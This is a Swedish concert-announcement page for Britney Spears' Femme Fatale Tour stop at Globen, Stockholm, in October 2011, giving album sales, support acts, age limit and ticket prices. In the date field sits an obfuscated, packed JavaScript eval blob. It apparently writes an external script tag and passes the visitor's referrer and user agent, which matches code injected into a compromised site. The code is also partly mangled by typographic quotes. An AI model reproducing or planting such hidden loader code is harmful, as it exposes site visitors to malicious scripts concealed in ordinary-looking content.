Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Britney Spears till Stockholm

Britney Spears till Stockholm
Sebastian

Datum: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aieyn|var|u0026u|referrer|bhnsy||js|php’.split(’|’),0,{}))
Söndag 16 Oktober 2011, kl 19:30

Den stora popstjärnan och trendsättaren Britney Spears, som i mer än tio år har fängslat sin publik världen över, adderar nu datum även i Europa på sin FEMME FATALE TOUR. Turnén har premiär i Sacramen…

to, Kalifornien den 16 juni och exakt fyra månader senare gästar hon Sverige och Stockholm.

Britney Spears fortsätter att influera generationer av popfans med hennes redan rosade sjunde album, ”Femme Fatale”, som släpptes i mars. Albumet gick direkt in på svenska albumlistans femteplats. Exekutiva producenter av ”Femme Fatale” är Max Martin och Dr. Luke.

Första singeln från ”Femme Fatale” – ”Hold It Against Me” slog rekord i USA genom att vara den mest nedladdade singeln under en vecka, detta med imponerande 411 000 sålda digitala singlar. Den uppmärksammade videon till ”Hold It Against Me” regisserades av Jonas Åkerlund. Den aktuella singeln, ”Till The World Ends” är en stor hit världen över och räknas idag som en av Britneys största radiohits. De dansvänliga låtarna på nya albumet ger oss tydliga hintar om att Britney Spears ger oss en fantastisk och energisk show med sin Femme Fatale Tour.

Britney har sålt mer än 67 miljoner album sedan debuten 1999 och hon har placerat mer än tjugofyra hits på Billboards Mainstream Top 40-lista. Britney Spears kan också stoltsera med att hon är den enda kvinnliga artisten som har gått in direkt som etta på Billboard Album Chart hela sex gånger.

Joe Jonas, från popbandet Jonas Brothers kommer att vara förband.
Dessutom får vi se Destinee & Paris.

Åldersgräns 13 år.

Globen – Ericsson Globe
Globentorget 2
12177 Stockholm

Pris från 330 till 995 kr